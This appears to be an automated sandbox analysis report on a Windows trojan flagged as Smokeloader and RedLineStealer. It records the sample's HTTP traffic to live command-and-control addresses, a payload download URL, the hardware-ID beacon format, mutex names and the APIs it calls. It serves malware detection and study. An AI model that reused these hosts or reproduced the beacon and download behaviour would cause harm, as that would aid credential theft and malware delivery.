00 00 00 00 00 00 40 03 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5b 25 03 00 00 10 00 00 00 26 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 23 00 00 00 40 03 00 00 24 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc e2 63 02 00 70 03 00 00 1c 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 75 78 6f 7a 00 00 48 49 00 00 00 60 67 02 00 3e 00 00 00 6a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 b5 00 00 00 b0 67 02 00 b6 00 00 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.88Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /7bbacc20a3bd2eb5.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 92.255.57.88Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 32 46 43 31 36 35 32 39 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="hwid"102FC16529061437788654------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="build"551488411------IJKFHDBKFCAAECBFIDHJ--
                  Source: Joe Sandbox ViewIP Address: 176.113.115.37 176.113.115.37
                  Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
                  Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00402A05 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A05
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.88Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: unknownHTTP traffic detected: POST /7bbacc20a3bd2eb5.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 92.255.57.88Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 32 46 43 31 36 35 32 39 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="hwid"102FC16529061437788654------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="build"551488411------IJKFHDBKFCAAECBFIDHJ--
                  Source: 6X4BIzTTBR.exe, 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeh51rtjrk4e8rerSOFTWARE
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exekm
                  Source: ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.php
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpK
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpM
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpb
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpf
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/System32
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/_
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88/t
                  Source: ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.88BR
                  Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: 6X4BIzTTBR.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEH
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D1946 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_046D1946
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00409770 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,1_2_00409770

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D2612 NtdllDefWindowProc_W,PostQuitMessage,0_2_046D2612
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D236E NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_046D236E
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004280320_2_00428032
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004071C10_2_004071C1
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004373E90_2_004373E9
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042D4FE0_2_0042D4FE
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004274940_2_00427494
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004285700_2_00428570
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004166BF0_2_004166BF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004137350_2_00413735
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004278060_2_00427806
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0040E98A0_2_0040E98A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042EAF00_2_0042EAF0
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00427AB00_2_00427AB0
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00418ABF0_2_00418ABF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00436CCF0_2_00436CCF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00427D770_2_00427D77
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00413F1B0_2_00413F1B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F76FB0_2_046F76FB
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046FD7650_2_046FD765
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F87D70_2_046F87D7
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046FED570_2_046FED57
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E41820_2_046E4182
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F82990_2_046F8299
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046FED570_2_046FED57
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E8D260_2_046E8D26
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F7D170_2_046F7D17
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_04706F360_2_04706F36
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F7FDE0_2_046F7FDE
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E69260_2_046E6926
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E399C0_2_046E399C
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F7A6D0_2_046F7A6D
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046DEBF10_2_046DEBF1
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C94D271_2_02C94D27
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: String function: 046E0997 appears 52 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: String function: 00410730 appears 52 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: String function: 0040F919 appears 36 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: String function: 0040FDC8 appears 123 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: String function: 046E002F appears 119 times
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: String function: 00404A60 appears 317 times
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288
                  Source: 6X4BIzTTBR.exeBinary or memory string: OriginalFileName vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.1762460911.0000000004780000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 6X4BIzTTBR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ED60.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C0E17E CreateToolhelp32Snapshot,Module32First,0_2_02C0E17E
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8CF29 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_02C8CF29
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeMutant created: \Sessions\1\BaseNamedObjects\h51rtjrk4e8rer
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile created: C:\Users\user\AppData\Local\Temp\ED60.tmpJump to behavior
                  Source: 6X4BIzTTBR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 6X4BIzTTBR.exeReversingLabs: Detection: 34%
                  Source: unknownProcess created: C:\Users\user\Desktop\6X4BIzTTBR.exe "C:\Users\user\Desktop\6X4BIzTTBR.exe"
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeProcess created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeProcess created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: rasadhlp.dllJump to behavior
